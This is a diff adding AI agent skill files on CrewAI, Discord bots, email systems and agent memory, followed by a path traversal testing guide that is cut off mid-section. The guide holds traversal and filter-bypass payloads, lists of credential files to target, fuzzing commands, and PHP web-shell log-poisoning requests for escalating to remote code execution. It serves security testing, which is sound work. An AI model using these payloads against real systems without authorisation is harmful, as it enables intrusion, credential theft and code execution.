## Patterns
|
||||
|
||||
### Tiered Memory System
|
||||
|
||||
Different memory tiers for different purposes
|
||||
|
||||
### Entity Memory
|
||||
|
||||
Store and update facts about entities
|
||||
|
||||
### Memory-Aware Prompting
|
||||
|
||||
Include relevant memories in prompts
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Remember Everything
|
||||
|
||||
### ❌ No Memory Retrieval
|
||||
|
||||
### ❌ Single Memory Store
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Memory store grows unbounded, system slows | high | // Implement memory lifecycle management |
|
||||
| Retrieved memories not relevant to current query | high | // Intelligent memory retrieval |
|
||||
| Memories from one user accessible to another | critical | // Strict user isolation in memory |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `context-window-management`, `rag-implementation`, `prompt-caching`, `llm-npc-dialogue`
|
||||
243
skills/crewai/SKILL.md
Normal file
243
skills/crewai/SKILL.md
Normal file
@@ -0,0 +1,243 @@
|
||||
---
|
||||
name: crewai
|
||||
description: "Expert in CrewAI - the leading role-based multi-agent framework used by 60% of Fortune 500 companies. Covers agent design with roles and goals, task definition, crew orchestration, process types (sequential, hierarchical, parallel), memory systems, and flows for complex workflows. Essential for building collaborative AI agent teams. Use when: crewai, multi-agent team, agent roles, crew of agents, role-based agents."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# CrewAI
|
||||
|
||||
**Role**: CrewAI Multi-Agent Architect
|
||||
|
||||
You are an expert in designing collaborative AI agent teams with CrewAI. You think
|
||||
in terms of roles, responsibilities, and delegation. You design clear agent personas
|
||||
with specific expertise, create well-defined tasks with expected outputs, and
|
||||
orchestrate crews for optimal collaboration. You know when to use sequential vs
|
||||
hierarchical processes.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Agent definitions (role, goal, backstory)
|
||||
- Task design and dependencies
|
||||
- Crew orchestration
|
||||
- Process types (sequential, hierarchical)
|
||||
- Memory configuration
|
||||
- Tool integration
|
||||
- Flows for complex workflows
|
||||
|
||||
## Requirements
|
||||
|
||||
- Python 3.10+
|
||||
- crewai package
|
||||
- LLM API access
|
||||
|
||||
## Patterns
|
||||
|
||||
### Basic Crew with YAML Config
|
||||
|
||||
Define agents and tasks in YAML (recommended)
|
||||
|
||||
**When to use**: Any CrewAI project
|
||||
|
||||
```python
|
||||
# config/agents.yaml
|
||||
researcher:
|
||||
role: "Senior Research Analyst"
|
||||
goal: "Find comprehensive, accurate information on {topic}"
|
||||
backstory: |
|
||||
You are an expert researcher with years of experience
|
||||
in gathering and analyzing information. You're known
|
||||
for your thorough and accurate research.
|
||||
tools:
|
||||
- SerperDevTool
|
||||
- WebsiteSearchTool
|
||||
verbose: true
|
||||
|
||||
writer:
|
||||
role: "Content Writer"
|
||||
goal: "Create engaging, well-structured content"
|
||||
backstory: |
|
||||
You are a skilled writer who transforms research
|
||||
into compelling narratives. You focus on clarity
|
||||
and engagement.
|
||||
verbose: true
|
||||
|
||||
# config/tasks.yaml
|
||||
research_task:
|
||||
description: |
|
||||
Research the topic: {topic}
|
||||
|
||||
Focus on:
|
||||
1. Key facts and statistics
|
||||
2. Recent developments
|
||||
3. Expert opinions
|
||||
4. Contrarian viewpoints
|
||||
|
||||
Be thorough and cite sources.
|
||||
agent: researcher
|
||||
expected_output: |
|
||||
A comprehensive research report with:
|
||||
- Executive summary
|
||||
- Key findings (bulleted)
|
||||
- Sources cited
|
||||
|
||||
writing_task:
|
||||
description: |
|
||||
Using the research provided, write an article about {topic}.
|
||||
|
||||
Requirements:
|
||||
- 800-1000 words
|
||||
- Engaging introduction
|
||||
- Clear structure with headers
|
||||
- Actionable conclusion
|
||||
agent: writer
|
||||
expected_output: "A polished article ready for publication"
|
||||
context:
|
||||
- research_task # Uses output from research
|
||||
|
||||
# crew.py
|
||||
from crewai import Agent, Task, Crew, Process
|
||||
from crewai.project import CrewBase, agent, task, crew
|
||||
|
||||
@CrewBase
|
||||
class ContentCrew:
|
||||
agents_config = 'config/agents.yaml'
|
||||
tasks_config = 'config/tasks.yaml'
|
||||
|
||||
@agent
|
||||
def researcher(self) -> Agent:
|
||||
return Agent(config=self.agents_config['researcher'])
|
||||
|
||||
@agent
|
||||
def writer(self) -> Agent:
|
||||
return Agent(config=self.agents_config['writer'])
|
||||
|
||||
@task
|
||||
def research_task(self) -> Task:
|
||||
return Task(config=self.tasks_config['research_task'])
|
||||
|
||||
@task
|
||||
def writing_task(self) -> Task:
|
||||
return Task(config
|
||||
```
|
||||
|
||||
### Hierarchical Process
|
||||
|
||||
Manager agent delegates to workers
|
||||
|
||||
**When to use**: Complex tasks needing coordination
|
||||
|
||||
```python
|
||||
from crewai import Crew, Process
|
||||
|
||||
# Define specialized agents
|
||||
researcher = Agent(
|
||||
role="Research Specialist",
|
||||
goal="Find accurate information",
|
||||
backstory="Expert researcher..."
|
||||
)
|
||||
|
||||
analyst = Agent(
|
||||
role="Data Analyst",
|
||||
goal="Analyze and interpret data",
|
||||
backstory="Expert analyst..."
|
||||
)
|
||||
|
||||
writer = Agent(
|
||||
role="Content Writer",
|
||||
goal="Create engaging content",
|
||||
backstory="Expert writer..."
|
||||
)
|
||||
|
||||
# Hierarchical crew - manager coordinates
|
||||
crew = Crew(
|
||||
agents=[researcher, analyst, writer],
|
||||
tasks=[research_task, analysis_task, writing_task],
|
||||
process=Process.hierarchical,
|
||||
manager_llm=ChatOpenAI(model="gpt-4o"), # Manager model
|
||||
verbose=True
|
||||
)
|
||||
|
||||
# Manager decides:
|
||||
# - Which agent handles which task
|
||||
# - When to delegate
|
||||
# - How to combine results
|
||||
|
||||
result = crew.kickoff()
|
||||
```
|
||||
|
||||
### Planning Feature
|
||||
|
||||
Generate execution plan before running
|
||||
|
||||
**When to use**: Complex workflows needing structure
|
||||
|
||||
```python
|
||||
from crewai import Crew, Process
|
||||
|
||||
# Enable planning
|
||||
crew = Crew(
|
||||
agents=[researcher, writer, reviewer],
|
||||
tasks=[research, write, review],
|
||||
process=Process.sequential,
|
||||
planning=True, # Enable planning
|
||||
planning_llm=ChatOpenAI(model="gpt-4o") # Planner model
|
||||
)
|
||||
|
||||
# With planning enabled:
|
||||
# 1. CrewAI generates step-by-step plan
|
||||
# 2. Plan is injected into each task
|
||||
# 3. Agents see overall structure
|
||||
# 4. More consistent results
|
||||
|
||||
result = crew.kickoff()
|
||||
|
||||
# Access the plan
|
||||
print(crew.plan)
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Vague Agent Roles
|
||||
|
||||
**Why bad**: Agent doesn't know its specialty.
|
||||
Overlapping responsibilities.
|
||||
Poor task delegation.
|
||||
|
||||
**Instead**: Be specific:
|
||||
- "Senior React Developer" not "Developer"
|
||||
- "Financial Analyst specializing in crypto" not "Analyst"
|
||||
Include specific skills in backstory.
|
||||
|
||||
### ❌ Missing Expected Outputs
|
||||
|
||||
**Why bad**: Agent doesn't know done criteria.
|
||||
Inconsistent outputs.
|
||||
Hard to chain tasks.
|
||||
|
||||
**Instead**: Always specify expected_output:
|
||||
expected_output: |
|
||||
A JSON object with:
|
||||
- summary: string (100 words max)
|
||||
- key_points: list of strings
|
||||
- confidence: float 0-1
|
||||
|
||||
### ❌ Too Many Agents
|
||||
|
||||
**Why bad**: Coordination overhead.
|
||||
Inconsistent communication.
|
||||
Slower execution.
|
||||
|
||||
**Instead**: 3-5 agents with clear roles.
|
||||
One agent can handle multiple related tasks.
|
||||
Use tools instead of agents for simple actions.
|
||||
|
||||
## Limitations
|
||||
|
||||
- Python-only
|
||||
- Best for structured workflows
|
||||
- Can be verbose for simple cases
|
||||
- Flows are newer feature
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `langgraph`, `autonomous-agents`, `langfuse`, `structured-output`
|
||||
277
skills/discord-bot-architect/SKILL.md
Normal file
277
skills/discord-bot-architect/SKILL.md
Normal file
@@ -0,0 +1,277 @@
|
||||
---
|
||||
name: discord-bot-architect
|
||||
description: "Specialized skill for building production-ready Discord bots. Covers Discord.js (JavaScript) and Pycord (Python), gateway intents, slash commands, interactive components, rate limiting, and sharding."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Discord Bot Architect
|
||||
|
||||
## Patterns
|
||||
|
||||
### Discord.js v14 Foundation
|
||||
|
||||
Modern Discord bot setup with Discord.js v14 and slash commands
|
||||
|
||||
**When to use**: ['Building Discord bots with JavaScript/TypeScript', 'Need full gateway connection with events', 'Building bots with complex interactions']
|
||||
|
||||
```javascript
|
||||
```javascript
|
||||
// src/index.js
|
||||
const { Client, Collection, GatewayIntentBits, Events } = require('discord.js');
|
||||
const fs = require('node:fs');
|
||||
const path = require('node:path');
|
||||
require('dotenv').config();
|
||||
|
||||
// Create client with minimal required intents
|
||||
const client = new Client({
|
||||
intents: [
|
||||
GatewayIntentBits.Guilds,
|
||||
// Add only what you need:
|
||||
// GatewayIntentBits.GuildMessages,
|
||||
// GatewayIntentBits.MessageContent, // PRIVILEGED - avoid if possible
|
||||
]
|
||||
});
|
||||
|
||||
// Load commands
|
||||
client.commands = new Collection();
|
||||
const commandsPath = path.join(__dirname, 'commands');
|
||||
const commandFiles = fs.readdirSync(commandsPath).filter(f => f.endsWith('.js'));
|
||||
|
||||
for (const file of commandFiles) {
|
||||
const filePath = path.join(commandsPath, file);
|
||||
const command = require(filePath);
|
||||
if ('data' in command && 'execute' in command) {
|
||||
client.commands.set(command.data.name, command);
|
||||
}
|
||||
}
|
||||
|
||||
// Load events
|
||||
const eventsPath = path.join(__dirname, 'events');
|
||||
const eventFiles = fs.readdirSync(eventsPath).filter(f => f.endsWith('.js'));
|
||||
|
||||
for (const file of eventFiles) {
|
||||
const filePath = path.join(eventsPath, file);
|
||||
const event = require(filePath);
|
||||
if (event.once) {
|
||||
client.once(event.name, (...args) => event.execute(...args));
|
||||
} else {
|
||||
client.on(event.name, (...args) => event.execute(...args));
|
||||
}
|
||||
}
|
||||
|
||||
client.login(process.env.DISCORD_TOKEN);
|
||||
```
|
||||
|
||||
```javascript
|
||||
// src/commands/ping.js
|
||||
const { SlashCommandBuilder } = require('discord.js');
|
||||
|
||||
module.exports = {
|
||||
data: new SlashCommandBuilder()
|
||||
.setName('ping')
|
||||
.setDescription('Replies with Pong!'),
|
||||
|
||||
async execute(interaction) {
|
||||
const sent = await interaction.reply({
|
||||
content: 'Pinging...',
|
||||
fetchReply: true
|
||||
});
|
||||
|
||||
const latency = sent.createdTimestamp - interaction.createdTimestamp;
|
||||
await interaction.editReply(`Pong! Latency: ${latency}ms`);
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
```javascript
|
||||
// src/events/interactionCreate.js
|
||||
const { Events } = require('discord.js');
|
||||
|
||||
module.exports = {
|
||||
name: Event
|
||||
```
|
||||
|
||||
### Pycord Bot Foundation
|
||||
|
||||
Discord bot with Pycord (Python) and application commands
|
||||
|
||||
**When to use**: ['Building Discord bots with Python', 'Prefer async/await patterns', 'Need good slash command support']
|
||||
|
||||
```python
|
||||
```python
|
||||
# main.py
|
||||
import os
|
||||
import discord
|
||||
from discord.ext import commands
|
||||
from dotenv import load_dotenv
|
||||
|
||||
load_dotenv()
|
||||
|
||||
# Configure intents - only enable what you need
|
||||
intents = discord.Intents.default()
|
||||
# intents.message_content = True # PRIVILEGED - avoid if possible
|
||||
# intents.members = True # PRIVILEGED
|
||||
|
||||
bot = commands.Bot(
|
||||
command_prefix="!", # Legacy, prefer slash commands
|
||||
intents=intents
|
||||
)
|
||||
|
||||
@bot.event
|
||||
async def on_ready():
|
||||
print(f"Logged in as {bot.user}")
|
||||
# Sync commands (do this carefully - see sharp edges)
|
||||
# await bot.sync_commands()
|
||||
|
||||
# Slash command
|
||||
@bot.slash_command(name="ping", description="Check bot latency")
|
||||
async def ping(ctx: discord.ApplicationContext):
|
||||
latency = round(bot.latency * 1000)
|
||||
await ctx.respond(f"Pong! Latency: {latency}ms")
|
||||
|
||||
# Slash command with options
|
||||
@bot.slash_command(name="greet", description="Greet a user")
|
||||
async def greet(
|
||||
ctx: discord.ApplicationContext,
|
||||
user: discord.Option(discord.Member, "User to greet"),
|
||||
message: discord.Option(str, "Custom message", required=False)
|
||||
):
|
||||
msg = message or "Hello!"
|
||||
await ctx.respond(f"{user.mention}, {msg}")
|
||||
|
||||
# Load cogs
|
||||
for filename in os.listdir("./cogs"):
|
||||
if filename.endswith(".py"):
|
||||
bot.load_extension(f"cogs.{filename[:-3]}")
|
||||
|
||||
bot.run(os.environ["DISCORD_TOKEN"])
|
||||
```
|
||||
|
||||
```python
|
||||
# cogs/general.py
|
||||
import discord
|
||||
from discord.ext import commands
|
||||
|
||||
class General(commands.Cog):
|
||||
def __init__(self, bot):
|
||||
self.bot = bot
|
||||
|
||||
@commands.slash_command(name="info", description="Bot information")
|
||||
async def info(self, ctx: discord.ApplicationContext):
|
||||
embed = discord.Embed(
|
||||
title="Bot Info",
|
||||
description="A helpful Discord bot",
|
||||
color=discord.Color.blue()
|
||||
)
|
||||
embed.add_field(name="Servers", value=len(self.bot.guilds))
|
||||
embed.add_field(name="Latency", value=f"{round(self.bot.latency * 1000)}ms")
|
||||
await ctx.respond(embed=embed)
|
||||
|
||||
@commands.Cog.
|
||||
```
|
||||
|
||||
### Interactive Components Pattern
|
||||
|
||||
Using buttons, select menus, and modals for rich UX
|
||||
|
||||
**When to use**: ['Need interactive user interfaces', 'Collecting user input beyond slash command options', 'Building menus, confirmations, or forms']
|
||||
|
||||
```python
|
||||
```javascript
|
||||
// Discord.js - Buttons and Select Menus
|
||||
const {
|
||||
SlashCommandBuilder,
|
||||
ActionRowBuilder,
|
||||
ButtonBuilder,
|
||||
ButtonStyle,
|
||||
StringSelectMenuBuilder,
|
||||
ModalBuilder,
|
||||
TextInputBuilder,
|
||||
TextInputStyle
|
||||
} = require('discord.js');
|
||||
|
||||
module.exports = {
|
||||
data: new SlashCommandBuilder()
|
||||
.setName('menu')
|
||||
.setDescription('Shows an interactive menu'),
|
||||
|
||||
async execute(interaction) {
|
||||
// Button row
|
||||
const buttonRow = new ActionRowBuilder()
|
||||
.addComponents(
|
||||
new ButtonBuilder()
|
||||
.setCustomId('confirm')
|
||||
.setLabel('Confirm')
|
||||
.setStyle(ButtonStyle.Primary),
|
||||
new ButtonBuilder()
|
||||
.setCustomId('cancel')
|
||||
.setLabel('Cancel')
|
||||
.setStyle(ButtonStyle.Danger),
|
||||
new ButtonBuilder()
|
||||
.setLabel('Documentation')
|
||||
.setURL('https://discord.js.org')
|
||||
.setStyle(ButtonStyle.Link) // Link buttons don't emit events
|
||||
);
|
||||
|
||||
// Select menu row (one per row, takes all 5 slots)
|
||||
const selectRow = new ActionRowBuilder()
|
||||
.addComponents(
|
||||
new StringSelectMenuBuilder()
|
||||
.setCustomId('select-role')
|
||||
.setPlaceholder('Select a role')
|
||||
.setMinValues(1)
|
||||
.setMaxValues(3)
|
||||
.addOptions([
|
||||
{ label: 'Developer', value: 'dev', emoji: '💻' },
|
||||
{ label: 'Designer', value: 'design', emoji: '🎨' },
|
||||
{ label: 'Community', value: 'community', emoji: '🎉' }
|
||||
])
|
||||
);
|
||||
|
||||
await interaction.reply({
|
||||
content: 'Choose an option:',
|
||||
components: [buttonRow, selectRow]
|
||||
});
|
||||
|
||||
// Collect responses
|
||||
const collector = interaction.channel.createMessageComponentCollector({
|
||||
filter: i => i.user.id === interaction.user.id,
|
||||
time: 60_000 // 60 seconds timeout
|
||||
});
|
||||
|
||||
collector.on('collect', async i => {
|
||||
if (i.customId === 'confirm') {
|
||||
await i.update({ content: 'Confirmed!', components: [] });
|
||||
collector.stop();
|
||||
} else if (i.custo
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Message Content for Commands
|
||||
|
||||
**Why bad**: Message Content Intent is privileged and deprecated for bot commands.
|
||||
Slash commands are the intended approach.
|
||||
|
||||
### ❌ Syncing Commands on Every Start
|
||||
|
||||
**Why bad**: Command registration is rate limited. Global commands take up to 1 hour
|
||||
to propagate. Syncing on every start wastes API calls and can hit limits.
|
||||
|
||||
### ❌ Blocking the Event Loop
|
||||
|
||||
**Why bad**: Discord gateway requires regular heartbeats. Blocking operations
|
||||
cause missed heartbeats and disconnections.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | ## Acknowledge immediately, process later |
|
||||
| Issue | critical | ## Step 1: Enable in Developer Portal |
|
||||
| Issue | high | ## Use a separate deploy script (not on startup) |
|
||||
| Issue | critical | ## Never hardcode tokens |
|
||||
| Issue | high | ## Generate correct invite URL |
|
||||
| Issue | medium | ## Development: Use guild commands |
|
||||
| Issue | medium | ## Never block the event loop |
|
||||
| Issue | medium | ## Show modal immediately |
|
||||
54
skills/email-systems/SKILL.md
Normal file
54
skills/email-systems/SKILL.md
Normal file
@@ -0,0 +1,54 @@
|
||||
---
|
||||
name: email-systems
|
||||
description: "Email has the highest ROI of any marketing channel. $36 for every $1 spent. Yet most startups treat it as an afterthought - bulk blasts, no personalization, landing in spam folders. This skill covers transactional email that works, marketing automation that converts, deliverability that reaches inboxes, and the infrastructure decisions that scale. Use when: keywords, file_patterns, code_patterns."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Email Systems
|
||||
|
||||
You are an email systems engineer who has maintained 99.9% deliverability
|
||||
across millions of emails. You've debugged SPF/DKIM/DMARC, dealt with
|
||||
blacklists, and optimized for inbox placement. You know that email is the
|
||||
highest ROI channel when done right, and a spam folder nightmare when done
|
||||
wrong. You treat deliverability as infrastructure, not an afterthought.
|
||||
|
||||
## Patterns
|
||||
|
||||
### Transactional Email Queue
|
||||
|
||||
Queue all transactional emails with retry logic and monitoring
|
||||
|
||||
### Email Event Tracking
|
||||
|
||||
Track delivery, opens, clicks, bounces, and complaints
|
||||
|
||||
### Template Versioning
|
||||
|
||||
Version email templates for rollback and A/B testing
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ HTML email soup
|
||||
|
||||
**Why bad**: Email clients render differently. Outlook breaks everything.
|
||||
|
||||
### ❌ No plain text fallback
|
||||
|
||||
**Why bad**: Some clients strip HTML. Accessibility issues. Spam signal.
|
||||
|
||||
### ❌ Huge image emails
|
||||
|
||||
**Why bad**: Images blocked by default. Spam trigger. Slow loading.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Missing SPF, DKIM, or DMARC records | critical | # Required DNS records: |
|
||||
| Using shared IP for transactional email | high | # Transactional email strategy: |
|
||||
| Not processing bounce notifications | high | # Bounce handling requirements: |
|
||||
| Missing or hidden unsubscribe link | critical | # Unsubscribe requirements: |
|
||||
| Sending HTML without plain text alternative | medium | # Always send multipart: |
|
||||
| Sending high volume from new IP immediately | high | # IP warm-up schedule: |
|
||||
| Emailing people who did not opt in | critical | # Permission requirements: |
|
||||
| Emails that are mostly or entirely images | medium | # Balance images and text: |
|
||||
483
skills/file-path-traversal/SKILL.md
Normal file
483
skills/file-path-traversal/SKILL.md
Normal file
@@ -0,0 +1,483 @@
|
||||
---
|
||||
name: File Path Traversal Testing
|
||||
description: This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". It provides comprehensive file path traversal attack and testing methodologies.
|
||||
---
|
||||
|
||||
# File Path Traversal Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code. This vulnerability occurs when user-controllable input is passed to filesystem APIs without proper validation.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
### Required Tools
|
||||
- Web browser with developer tools
|
||||
- Burp Suite or OWASP ZAP
|
||||
- cURL for testing payloads
|
||||
- Wordlists for automation
|
||||
- ffuf or wfuzz for fuzzing
|
||||
|
||||
### Required Knowledge
|
||||
- HTTP request/response structure
|
||||
- Linux and Windows filesystem layout
|
||||
- Web application architecture
|
||||
- Basic understanding of file APIs
|
||||
|
||||
## Outputs and Deliverables
|
||||
|
||||
1. **Vulnerability Report** - Identified traversal points and severity
|
||||
2. **Exploitation Proof** - Extracted file contents
|
||||
3. **Impact Assessment** - Accessible files and data exposure
|
||||
4. **Remediation Guidance** - Secure coding recommendations
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: Understanding Path Traversal
|
||||
|
||||
Path traversal occurs when applications use user input to construct file paths:
|
||||
|
||||
```php
|
||||
// Vulnerable PHP code example
|
||||
$template = "blue.php";
|
||||
if (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {
|
||||
$template = $_COOKIE['template'];
|
||||
}
|
||||
include("/home/user/templates/" . $template);
|
||||
```
|
||||
|
||||
Attack principle:
|
||||
- `../` sequence moves up one directory
|
||||
- Chain multiple sequences to reach root
|
||||
- Access files outside intended directory
|
||||
|
||||
Impact:
|
||||
- **Confidentiality** - Read sensitive files
|
||||
- **Integrity** - Write/modify files (in some cases)
|
||||
- **Availability** - Delete files (in some cases)
|
||||
- **Code Execution** - If combined with file upload or log poisoning
|
||||
|
||||
### Phase 2: Identifying Traversal Points
|
||||
|
||||
Map application for potential file operations:
|
||||
|
||||
```bash
|
||||
# Parameters that often handle files
|
||||
?file=
|
||||
?path=
|
||||
?page=
|
||||
?template=
|
||||
?filename=
|
||||
?doc=
|
||||
?document=
|
||||
?folder=
|
||||
?dir=
|
||||
?include=
|
||||
?src=
|
||||
?source=
|
||||
?content=
|
||||
?view=
|
||||
?download=
|
||||
?load=
|
||||
?read=
|
||||
?retrieve=
|
||||
```
|
||||
|
||||
Common vulnerable functionality:
|
||||
- Image loading: `/image?filename=23.jpg`
|
||||
- Template selection: `?template=blue.php`
|
||||
- File downloads: `/download?file=report.pdf`
|
||||
- Document viewers: `/view?doc=manual.pdf`
|
||||
- Include mechanisms: `?page=about`
|
||||
|
||||
### Phase 3: Basic Exploitation Techniques
|
||||
|
||||
#### Simple Path Traversal
|
||||
|
||||
```bash
|
||||
# Basic Linux traversal
|
||||
../../../etc/passwd
|
||||
../../../../etc/passwd
|
||||
../../../../../etc/passwd
|
||||
../../../../../../etc/passwd
|
||||
|
||||
# Windows traversal
|
||||
..\..\..\windows\win.ini
|
||||
..\..\..\..\windows\system32\drivers\etc\hosts
|
||||
|
||||
# URL encoded
|
||||
..%2F..%2F..%2Fetc%2Fpasswd
|
||||
..%252F..%252F..%252Fetc%252Fpasswd # Double encoding
|
||||
|
||||
# Test payloads with curl
|
||||
curl "http://target.com/image?filename=../../../etc/passwd"
|
||||
curl "http://target.com/download?file=....//....//....//etc/passwd"
|
||||
```
|
||||
|
||||
#### Absolute Path Injection
|
||||
|
||||
```bash
|
||||
# Direct absolute path (Linux)
|
||||
/etc/passwd
|
||||
/etc/shadow
|
||||
/etc/hosts
|
||||
/proc/self/environ
|
||||
|
||||
# Direct absolute path (Windows)
|
||||
C:\windows\win.ini
|
||||
C:\windows\system32\drivers\etc\hosts
|
||||
C:\boot.ini
|
||||
```
|
||||
|
||||
### Phase 4: Bypass Techniques
|
||||
|
||||
#### Bypass Stripped Traversal Sequences
|
||||
|
||||
```bash
|
||||
# When ../ is stripped once
|
||||
....//....//....//etc/passwd
|
||||
....\/....\/....\/etc/passwd
|
||||
|
||||
# Nested traversal
|
||||
..././..././..././etc/passwd
|
||||
....//....//etc/passwd
|
||||
|
||||
# Mixed encoding
|
||||
..%2f..%2f..%2fetc/passwd
|
||||
%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
|
||||
```
|
||||
|
||||
#### Bypass Extension Validation
|
||||
|
||||
```bash
|
||||
# Null byte injection (older PHP versions)
|
||||
../../../etc/passwd%00.jpg
|
||||
../../../etc/passwd%00.png
|
||||
|
||||
# Path truncation
|
||||
../../../etc/passwd...............................
|
||||
|
||||
# Double extension
|
||||
../../../etc/passwd.jpg.php
|
||||
```
|
||||
|
||||
#### Bypass Base Directory Validation
|
||||
|
||||
```bash
|
||||
# When path must start with expected directory
|
||||
/var/www/images/../../../etc/passwd
|
||||
|
||||
# Expected path followed by traversal
|
||||
images/../../../etc/passwd
|
||||
```
|
||||
|
||||
#### Bypass Blacklist Filters
|
||||
|
||||
```bash
|
||||
# Unicode/UTF-8 encoding
|
||||
..%c0%af..%c0%af..%c0%afetc/passwd
|
||||
..%c1%9c..%c1%9c..%c1%9cetc/passwd
|
||||
|
||||
# Overlong UTF-8 encoding
|
||||
%c0%2e%c0%2e%c0%af
|
||||
|
||||
# URL encoding variations
|
||||
%2e%2e/
|
||||
%2e%2e%5c
|
||||
..%5c
|
||||
..%255c
|
||||
|
||||
# Case variations (Windows)
|
||||
....\\....\\etc\\passwd
|
||||
```
|
||||
|
||||
### Phase 5: Linux Target Files
|
||||
|
||||
High-value files to target:
|
||||
|
||||
```bash
|
||||
# System files
|
||||
/etc/passwd # User accounts
|
||||
/etc/shadow # Password hashes (root only)
|
||||
/etc/group # Group information
|
||||
/etc/hosts # Host mappings
|
||||
/etc/hostname # System hostname
|
||||
/etc/issue # System banner
|
||||
|
||||
# SSH files
|
||||
/root/.ssh/id_rsa # Root private key
|
||||
/root/.ssh/authorized_keys # Authorized keys
|
||||
/home/<user>/.ssh/id_rsa # User private keys
|
||||
/etc/ssh/sshd_config # SSH configuration
|
||||
|
||||
# Web server files
|
||||
/etc/apache2/apache2.conf
|
||||
/etc/nginx/nginx.conf
|
||||
/etc/apache2/sites-enabled/000-default.conf
|
||||
/var/log/apache2/access.log
|
||||
/var/log/apache2/error.log
|
||||
/var/log/nginx/access.log
|
||||
|
||||
# Application files
|
||||
/var/www/html/config.php
|
||||
/var/www/html/wp-config.php
|
||||
/var/www/html/.htaccess
|
||||
/var/www/html/web.config
|
||||
|
||||
# Process information
|
||||
/proc/self/environ # Environment variables
|
||||
/proc/self/cmdline # Process command line
|
||||
/proc/self/fd/0 # File descriptors
|
||||
/proc/version # Kernel version
|
||||
|
||||
# Common application configs
|
||||
/etc/mysql/my.cnf
|
||||
/etc/postgresql/*/postgresql.conf
|
||||
/opt/lampp/etc/httpd.conf
|
||||
```
|
||||
|
||||
### Phase 6: Windows Target Files
|
||||
|
||||
Windows-specific targets:
|
||||
|
||||
```bash
|
||||
# System files
|
||||
C:\windows\win.ini
|
||||
C:\windows\system.ini
|
||||
C:\boot.ini
|
||||
C:\windows\system32\drivers\etc\hosts
|
||||
C:\windows\system32\config\SAM
|
||||
C:\windows\repair\SAM
|
||||
|
||||
# IIS files
|
||||
C:\inetpub\wwwroot\web.config
|
||||
C:\inetpub\logs\LogFiles\W3SVC1\
|
||||
|
||||
# Configuration files
|
||||
C:\xampp\apache\conf\httpd.conf
|
||||
C:\xampp\mysql\data\mysql\user.MYD
|
||||
C:\xampp\passwords.txt
|
||||
C:\xampp\phpmyadmin\config.inc.php
|
||||
|
||||
# User files
|
||||
C:\Users\<user>\.ssh\id_rsa
|
||||
C:\Users\<user>\Desktop\
|
||||
C:\Documents and Settings\<user>\
|
||||
```
|
||||
|
||||
### Phase 7: Automated Testing
|
||||
|
||||
#### Using Burp Suite
|
||||
|
||||
```
|
||||
1. Capture request with file parameter
|
||||
2. Send to Intruder
|
||||
3. Mark file parameter value as payload position
|
||||
4. Load path traversal wordlist
|
||||
5. Start attack
|
||||
6. Filter responses by size/content for success
|
||||
```
|
||||
|
||||
#### Using ffuf
|
||||
|
||||
```bash
|
||||
# Basic traversal fuzzing
|
||||
ffuf -u "http://target.com/image?filename=FUZZ" \
|
||||
-w /usr/share/wordlists/traversal.txt \
|
||||
-mc 200
|
||||
|
||||
# Fuzzing with encoding
|
||||
ffuf -u "http://target.com/page?file=FUZZ" \
|
||||
-w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
|
||||
-mc 200,500 -ac
|
||||
```
|
||||
|
||||
#### Using wfuzz
|
||||
|
||||
```bash
|
||||
# Traverse to /etc/passwd
|
||||
wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
|
||||
--hc 404 \
|
||||
"http://target.com/index.php?file=FUZZ"
|
||||
|
||||
# With headers/cookies
|
||||
wfuzz -c -z file,traversal.txt \
|
||||
-H "Cookie: session=abc123" \
|
||||
"http://target.com/load?path=FUZZ"
|
||||
```
|
||||
|
||||
### Phase 8: LFI to RCE Escalation
|
||||
|
||||
#### Log Poisoning
|
||||
|
||||
```bash
|
||||
# Inject PHP code into logs
|
||||
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
|
||||
|
||||
# Include Apache log file
|
||||
curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"
|
||||
|
||||
# Include auth.log (SSH)
|
||||
# First: ssh '<?php system($_GET["cmd"]); ?>'@target.com
|
||||
curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
|
||||
```
|
||||
|
||||
#### Proc/self/environ
|
||||
|
||||
```bash
|
||||
# Inject via User-Agent
|
||||
curl -A "<?php system('id'); ?>" \
|
||||
"http://target.com/page?file=/proc/self/environ"
|
||||
|
||||
# With command parameter
|
||||
curl -A "<?php system(\$_GET['c']); ?>" \
|
||||
"http://target.com/page?file=/proc/self/environ&c=whoami"
|
||||
```
|
||||
|
||||
#### PHP Wrapper Exploitation
|
||||
|
||||
```bash
|
||||
# php://filter - Read source code as base64
|
||||
